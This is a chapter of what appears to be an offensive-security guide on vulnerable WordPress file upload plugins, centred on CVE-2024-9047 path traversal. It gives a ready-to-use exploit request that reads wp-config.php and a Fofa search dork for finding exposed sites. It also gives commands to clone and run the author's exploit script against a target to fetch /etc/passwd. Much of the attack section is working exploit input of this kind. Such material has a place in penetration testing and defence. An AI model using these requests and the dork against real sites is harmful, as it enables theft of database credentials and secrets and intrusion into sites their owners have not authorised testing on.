search

Vulnerable File Upload Plugins

hashtag
⚑ Key Vulnerable Plugins and Exploits

hashtag
1. Revslider Plugin Example Exploit (We saw it in the last chapter).

hashtag
2. WordPress File Upload ≀ 4.24.11 – Unauthenticated Path Traversal (CVE 2024-9047)

triangle-exclamation

πŸ’‘ Please note: this plugin not longer available fir download, but still out there in some sites.

  • Vulnerable File: wfu_file_downloader.php

  • Impact: Arbitrary File Read & Deletion

  • Attack Vector: Unauthenticated attackers can manipulate the file parameter with ../ sequences to escape the upload directory.

Example Exploit:

GET /wp-content/plugins/wp-file-upload/wfu_file_downloader.php?file=../../../../../../wp-config.php

This lets an attacker dump database credentials, salts, and keys straight from the wp-config.php.

Fofa Dork: body="wp-content/plugins/wp-file-upload" && body="wordpress-file-upload-style-css"

You can find my script in this repositoryarrow-up-right.

git clone https://github.com/verylazytech/CVE-2024-9047
cd CVE-2024-9047
chmod +x cve-2024-9047
./cve-2024-9047.sh www.vulnerablewebsite.com /etc/passwd

The script will check the plugin version and, if vulnerable, attempt to retrieve the specified file.

hashtag
πŸ”Ž Why File Upload Vulnerabilities Matter

  • Remote Code Execution (RCE): Malicious PHP files uploaded through a vulnerable plugin can be executed server-side.

  • Arbitrary File Read/Deletion: Path traversal flaws allow attackers to steal sensitive files like wp-config.php or delete system files.

  • Privilege Escalation: Even low-privileged users (e.g., subscribers) may exploit upload flaws to gain higher control.

If you need some more help with searching the right exploit look in this page.

PreviousMedia Library Upload AbuseNextImport / Export Functionality Exploits

Last updated